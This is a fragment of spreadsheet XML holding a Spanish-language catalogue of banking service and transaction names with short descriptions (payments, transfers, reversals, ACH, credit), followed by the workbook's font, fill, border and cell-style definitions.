    <t>Este servicio permite notificar que se debe realizar el cargue masivo  de los límites de los clientes en cartera.</t>
  </si>
  <si>
    <t>El servicio permite responder al canal Ventas Digitales las diferentes interacciones y pasos que tiene el flujo de solicitud de crédito de consumo.</t>
  </si>
  <si>
    <t>NotificacionEnvioReporteLeasing</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.2.4_Productos-CreditoConsumo</t>
  </si>
  <si>
    <t>NotificacionPagoDePlanilla</t>
  </si>
  <si>
    <t>Este servicio expone todas las operaciones requeridas para poder registrar el pago de una planilla asistida en el sistema de recaudos, incluyendo la consulta de información de una planilla asistida en el proveedor ACH.</t>
  </si>
  <si>
    <t>OfertaComercialTarjetasCredito</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Oferta Comercial Tarjetas Crédito permite a los consumidores calcular una oferta de tarjetas de crédito para un cliente </t>
  </si>
  <si>
    <t>P323-SU4:PagoCredito-CancelaciónCuentaDeAhorros</t>
  </si>
  <si>
    <t>Cancelacion de Cuentas de Ahorro. Permite realizar traslado de fondos disponibles a efectivo,  otra cuenta, o Cheque de Gerencia.</t>
  </si>
  <si>
    <t>P380-SU3:PagoDeGiroNacional</t>
  </si>
  <si>
    <t>Transacción que permite realizar el Pago de giros Nacionales a través del canal Sucursales Físicas.</t>
  </si>
  <si>
    <t>P380-SUT:PagoGirosNacionalesSucursalesFisicas</t>
  </si>
  <si>
    <t>Transacción que permite realizar el pago de giros nacionales a través del canal Sucursales Físicas.</t>
  </si>
  <si>
    <t>P749-SU2:ConsultaPagoDividendos</t>
  </si>
  <si>
    <t>Transacción que permite realizar la consulta de información desde GOLF y WOLF para las siguientes transacciones: Pago de Dividendos, Pago a Terceros y Pago de Giros Nacionales.</t>
  </si>
  <si>
    <t>P749-SUT:ConsultaPagodeDividendosSucursalesFisicas</t>
  </si>
  <si>
    <t>Transacción que permite realizar la consulta de Giros o de Pago por ventanilla.</t>
  </si>
  <si>
    <t>P956-SU6:CIERREDEOFICINA</t>
  </si>
  <si>
    <t>Transacción que permite ejecutar el cierre de una oficina especifica desde el Sistema Sif Branch.</t>
  </si>
  <si>
    <t>PSServiciosRecaudoService</t>
  </si>
  <si>
    <t>PagoCreditoHipotecario</t>
  </si>
  <si>
    <t xml:space="preserve"> Servicio que permite hacer el pago de crédito hipotecario de un cliente, los pagos que permite son 
•	Parcial: Permite hacer un abono al valor total del crédito hipotecario.
•	Cuota: Permite realizar el pago de la siguiente cuota disponible.
•	Total: Permite realizar el pago total del crédito hipotecario. 
</t>
  </si>
  <si>
    <t>PagoDePlanilla</t>
  </si>
  <si>
    <t>Servicio que permite pagar facturas inscritas debitando el dinero de la cuenta, realiza la afectación en tiempo real del saldo del cliente. Adicionalmente permite actualizar el valor a pagar de la factura si esta no tiene validación de base de datos.
Verifica la pertenencia de la cuenta, adicionalmente también permite validar y actualizar de ser necesario la personalización de topes, límites de pagos a terceros, límites de transferencias.</t>
  </si>
  <si>
    <t>PremioBCService</t>
  </si>
  <si>
    <t>RecaudoIntegradoAlNegocio</t>
  </si>
  <si>
    <t>RecaudosRIN</t>
  </si>
  <si>
    <t>RecaudosSPRC</t>
  </si>
  <si>
    <t>RecepcionNotificacionesPush</t>
  </si>
  <si>
    <t>Este servicio permitirá recibir las respuestas de las diferentes notificaciones push que fueron enviadas a los clientes por los diferentes canales de comunicación.
De igual forma, el servicio se encargara de entregar a los diferentes canales, la información de las notificaciones push que fueron solicitadas para autorización o rechazo de los clientes.</t>
  </si>
  <si>
    <t>RecuperacionInformacionAdquirencia</t>
  </si>
  <si>
    <t>El servicio RecuperacionInformacionAdquirencia permitirá a los consumidores consultar información propia de adquirencia como categorías de comercios, dispositivos, descripciones técnicas y características de dispositivos, preguntas frecuentes, entre otros.</t>
  </si>
  <si>
    <t>RecuperarDetallesEvento_BB8</t>
  </si>
  <si>
    <t>Este servicio, permite realizar la consulta del detalle relacionado a un evento que fue generado por el BB7.</t>
  </si>
  <si>
    <t>RecuperarExtracto</t>
  </si>
  <si>
    <t>RegistraLogPCC</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio RegistroLogPCC permite a quienes consumen los servicios de contactabilidad, por ejemplo EnvioSMSInalambria, registrar en un archivo de Log que actualmente se tiene en PCC cuando se realice la respuesta a dicho servicio. El objetivo de este servicio es identificar las transacciones realizadas por cada consumidor del servicio con el objetivo de hacer más eficiente la facturación y la distribución de los costos de los servicios de contactabilidad.
Este servicio hace parte del esquema transitorio de contactabilidad.
</t>
  </si>
  <si>
    <t>RegistroNovedadesService</t>
  </si>
  <si>
    <t>ReservadeGarantías</t>
  </si>
  <si>
    <t>El servicio Reserva de  Garantías permite al consumidor realizar un registro de una garantía del fondo nacional. Tiene como función orquestar los servicios de  GestionFondoNacionalGarantias_V1.0.0  y el servicio GestionGarantiasBancoFNG_v1.0.0.</t>
  </si>
  <si>
    <t>RespuestaSolicitudCreditoConsumo</t>
  </si>
  <si>
    <t>El servicio permite responder al canal Ventas Digitales las diferentes interacciones y pasos que tiene el flujo de solicitud de crédito de consumo que se encuentra orquestado en Bizagi</t>
  </si>
  <si>
    <t>RevisarIdentidadCliente</t>
  </si>
  <si>
    <t>El servicio le permite a los consumidores realizar la validación de una persona contra el servicio de Confronta de CIFIN, el cual tiene como objetivo validar si una persona es quien dice ser, basado en preguntas de su historial financiero.</t>
  </si>
  <si>
    <t>SeguimientoSolicitudesCliente</t>
  </si>
  <si>
    <t xml:space="preserve">Tracking es la herramienta objetivo que permite registrar y realizar seguimiento a las diferentes solicitudes que los clientes Bancolombia realizan a través de los diferentes canales de atención (por ej.: una solicitud de un producto, un PQR, un documento, etc.). Cada vez que una solicitud presente una novedad (por ej.: un cambio de estado o etapa), el área encargada de darle trámite notificará a Tracking está novedad y posteriormente tracking notificará al cliente (vía sms y/o email). De igual forma las novedades quedan disponibles para ser consultadas en cualquier momento, de esta forma el banco les proporciona a los clientes un mecanismo para que proactivamente puedan consultar en qué estado se encuentra su solicitud.
El objetivo de este servicio es ofrecer las capacidades que le permitan a las diferentes áreas del banco registrar las novedades de una solicitud y poder consultar el estado de la solicitud.
</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.9.4_Seguridad-Confidencialidad</t>
  </si>
  <si>
    <t>ServicioPagosService</t>
  </si>
  <si>
    <t>ServicioTramaDummy</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.9.3_Seguridad-Integridad</t>
  </si>
  <si>
    <t>SolicitudTokenACH</t>
  </si>
  <si>
    <t>Este servicio permite acceder a las APIs y/o servicios de ACH como proveedor de información, en este caso el servicio se crea inicialmente para el acceso al API de SOI-DATA, como producto de ACH, y así poder consumir el servicio “ConsultaInformacionFiscalYParafiscalDelCliente v1.0.0”. No obstante, en el caso de proveer otras APIs el proveedor ACH, el consumidor podrá hacerse uso de este servicio, como puerta de seguridad para esto deberá solicitar las credenciales al proveedor. Este acceso se solicita mediante la única operación en la que se obtiene un token que viajara y se validara en la cabecera de los servicios de ACH a consumir.</t>
  </si>
  <si>
    <t>T031-SU9:AperturadeCDT</t>
  </si>
  <si>
    <t>Esta transacción realiza la apertura de un producto de inversión CDT el cual se constituye a término fijo que genera una rentabilidad en intereses los cuales pueden ser consignados mensualmente o al vencimiento del término establecido. Las formas de pago para aperturar un CDT son desde una cuenta de ahorros o corriente, cheque y efectivo.</t>
  </si>
  <si>
    <t>TVP_GRABAR_PCCTRXTC</t>
  </si>
  <si>
    <t>Permite registrar las transacciones de compra y pago de impuesto exitosas en el archivo para posteo PCCFFTRXTC.</t>
  </si>
  <si>
    <t>TimeSeries_1</t>
  </si>
  <si>
    <t>TransaccionBCService</t>
  </si>
  <si>
    <t>TransaccionTokenInvestBot</t>
  </si>
  <si>
    <t>TransferenciaConPaypal</t>
  </si>
  <si>
    <t>El servicio  permitirá a los consumidores realizar una transferencia realizada desde  una cuenta  Paypal a una cuenta depósito.</t>
  </si>
  <si>
    <t>TransferenciaDeFondosInterbancariosACH</t>
  </si>
  <si>
    <t>Este servicio tiene como alcance realizar la orquestación de las transacciones de transferencias interbancarias ACH y administración de Beneficiarios en el banco.</t>
  </si>
  <si>
    <t>TransferenciaFinanciera</t>
  </si>
  <si>
    <t>Capacidad para realizar transferencias y pagos de clientes y cheques o transferencias y pagos de instituciones financieras.</t>
  </si>
  <si>
    <t>TransferenciaFondosBancaDigitalABanco</t>
  </si>
  <si>
    <t>Este servicio tiene como alcance realizar transferencia de fondos desde una cuenta de Banca Digital ( App Nequi) a una cuenta de Bancolombia</t>
  </si>
  <si>
    <t>TransferenciasCuentaMultiProducto</t>
  </si>
  <si>
    <t>El servicio TransferenciasCuentaMultiProducto permitirá a los consumidores realizar transferencias desde una cuenta MultiProducto a cuentas Bancolombia y ACH.</t>
  </si>
  <si>
    <t>TransferenciasFondosDeInversion</t>
  </si>
  <si>
    <t>El servicio TransferenciasFondosDeInversion permitirá a los consumidores realizar operaciones de transferencias de fondos de inversión colectiva; ya sea una adición, retiro, apertura o cancelación.</t>
  </si>
  <si>
    <t>TransmisionContenidoDocumental</t>
  </si>
  <si>
    <t>TrasferenciasInvestBot</t>
  </si>
  <si>
    <t>UserManagementSSPService</t>
  </si>
  <si>
    <t>UtilidadesPuntosColombia</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio le permite al centralizador, ejecutar diferentes tareas administrativas como validar conectividad(eco test) con PCO (puntos colombia) o verificar el estado de una transacción.
Este servicio se concibe como una funcionalidad exclusiva para el centralizador (o quien lo reemplace), que es el componente que se encarga de administrar y realizar la respectiva acreditación en PCO (puntos colombia), los puntos que los clientes Bancolombia ganan al utilizar los productos que el banco tiene habilitado para este propósito, por lo tanto, su uso se encuentra restringido a otros consumidores.
</t>
  </si>
  <si>
    <t>ValidacionReglasAdquirencia</t>
  </si>
  <si>
    <t>El servicio ValidacionReglasAdquirencia permitirá a los consumidores validar ante la nueva compañía (Newco) si el cliente pasa validaciones de riesgo y si el producto seleccionado requiere otro producto o servicio asociado.</t>
  </si>
  <si>
    <t>El servicio Verificación Código Autorización permite a los consumidores hacer la validación del código de autorización retornado en el proceso de autenticación de un cliente, para garantizar el acceso a diferentes funcionalidades. 
Actualmente Implementado en IIB10</t>
  </si>
  <si>
    <t>WebServiceGMFService</t>
  </si>
  <si>
    <t>X003-GR1:ReversoCrearGiro</t>
  </si>
  <si>
    <t>Transacción encargada de recibir una solicitud de reverción de un giro anteriormente creado de froma exitosa.</t>
  </si>
  <si>
    <t>X004-GR1:ReversoPagarGiro</t>
  </si>
  <si>
    <t>Transacción que permite pagar un giro que ha sido creado de forma exitosa.</t>
  </si>
  <si>
    <t>X004-GR1:TransacciónReversoPagarGiro</t>
  </si>
  <si>
    <t>Transaccion encrgada de pagar un giro que fue creado exitosamente</t>
  </si>
  <si>
    <t>X005-GR1:ReversoCancelarGiro</t>
  </si>
  <si>
    <t>Transacción que permite reversar la cancelación del giro.</t>
  </si>
  <si>
    <t>X380-SU3:ReversoPagoDeGiroNacional</t>
  </si>
  <si>
    <t>Transacción que permite realizar el reverso de la operación de Pago de Giros por el canal Sucursales Físicas</t>
  </si>
  <si>
    <t>X380-SUT:ReversoPagoGirosSucursalesFisicas</t>
  </si>
  <si>
    <t>Transacción que permite realizar el reverso del pago de Giros a través del canal Sucursales Físicas.</t>
  </si>
  <si>
    <t>XR01-AT8:ReversoDepositoenEfectivo-Atm(1.0.0)</t>
  </si>
  <si>
    <t>Reverso Deposito en Efectivo</t>
  </si>
  <si>
    <t>XR10-PO3:ReversoDeAnulacionCompra</t>
  </si>
  <si>
    <t>Reversa la anulación de la compra generada anteriormente, volviéndola como compra activa nuevamente.</t>
  </si>
  <si>
    <t>XR25-PO3:ReversodeComprasAhorroyCuentaCorriente</t>
  </si>
  <si>
    <t>Reversa la compra de cuenta de ahorro o cuenta corriente.</t>
  </si>
  <si>
    <t>XR26-PO3:ReversoCompraAhorroCuentaCorrientePosManual</t>
  </si>
  <si>
    <t>Reversa la compra de cuenta de ahorro o cuenta corriente de forma no presencial.</t>
  </si>
  <si>
    <t>XX29-AT9:ReversopagoenEfectivo</t>
  </si>
  <si>
    <t>Reverso pago en Efectivo cajero authentic</t>
  </si>
  <si>
    <t>prueba</t>
  </si>
  <si>
    <t>Prueba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</si>
</sst>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3"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color indexed="81"/>
      <name val="Tahoma"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <color indexed="81"/>
      <name val="Tahoma"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Trebuchet MS"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial Unicode MS"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial Unicode MS"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF152935"/>
      <name val="Helvetica"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1" tint="0.14999847407452621"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF152935"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="20"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="8">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4" tint="0.59999389629810485"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="9" tint="0.79998168889431442"/>
        <bgColor theme="9" tint="0.79998168889431442"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="5"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3" tint="0.59999389629810485"/>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theme="9" tint="0.39997558519241921"/>
      </top>
      <bottom style="thin">
        <color theme="9" tint="0.39997558519241921"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color theme="9" tint="0.39997558519241921"/>
      </left>
      <right style="thin">
        <color indexed="64"/>
      </right>
      <top style="thin">
        <color theme="9" tint="0.39997558519241921"/>
      </top>
      <bottom style="thin">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right style="thin">
        <color indexed="64"/>
      </right>
      <top style="thin">
        <color theme="9" tint="0.39997558519241921"/>
      </top>
      <bottom style="thin">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right/>
      <top style="thin">
        <color theme="9" tint="0.39997558519241921"/>
      </top>
      <bottom style="thin">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color theme="9" tint="0.39997558519241921"/>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theme="9" tint="0.39997558519241921"/>
      </top>
      <bottom style="thin">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right style="thin">
        <color indexed="64"/>
      </right>
      <top style="thin">
        <color indexed="64"/>
      </top>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1">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="100">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="6" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>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5" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="13" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="1" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>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0" fillId="0" borderId="3" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="14" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="1" fillId="2" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="3" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="17" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="1" fillId="2" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="21" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="22" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyBorder="1"/>
    <xf numFmtId="22" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="1" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="13" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="2" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="21" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="22" fontId="0" fillId="0" borderId="21" xfId="0" applyNumberFormat="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="21" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="5" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="13" fillId="4" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="13" fillId="4" borderId="22" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="5" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="23" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="24" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="5" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="1" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="5" fillId="6" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="2" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="1" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="21" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="21" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="22" fontId="0" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="3" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyBorder="1"/>
    <xf numFmtId="3" fontId="0" fillId="0" borderId="21" xfId="0" applyNumberFormat="1" applyBorder="1"/>
    <xf numFmtId="3" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyBorder="1"/>
    <xf numFmtId="3" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="3" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="3" fontId="11" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" pivotButton="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="26" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="27" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="25" xfId="0" pivotButton="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="7" borderId="28" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="7" borderId="29" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="7" borderId="22" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="118">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general" vertical="bottom" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <border outline="0">
        <top style="thin">
          <color rgb="FFA9D08E"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="none">
          <fgColor rgb="FFE2EFDA"/>
          <bgColor auto="1"/>
        </patternFill>
      </fill>
      <alignment horizontal="general"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3"/>
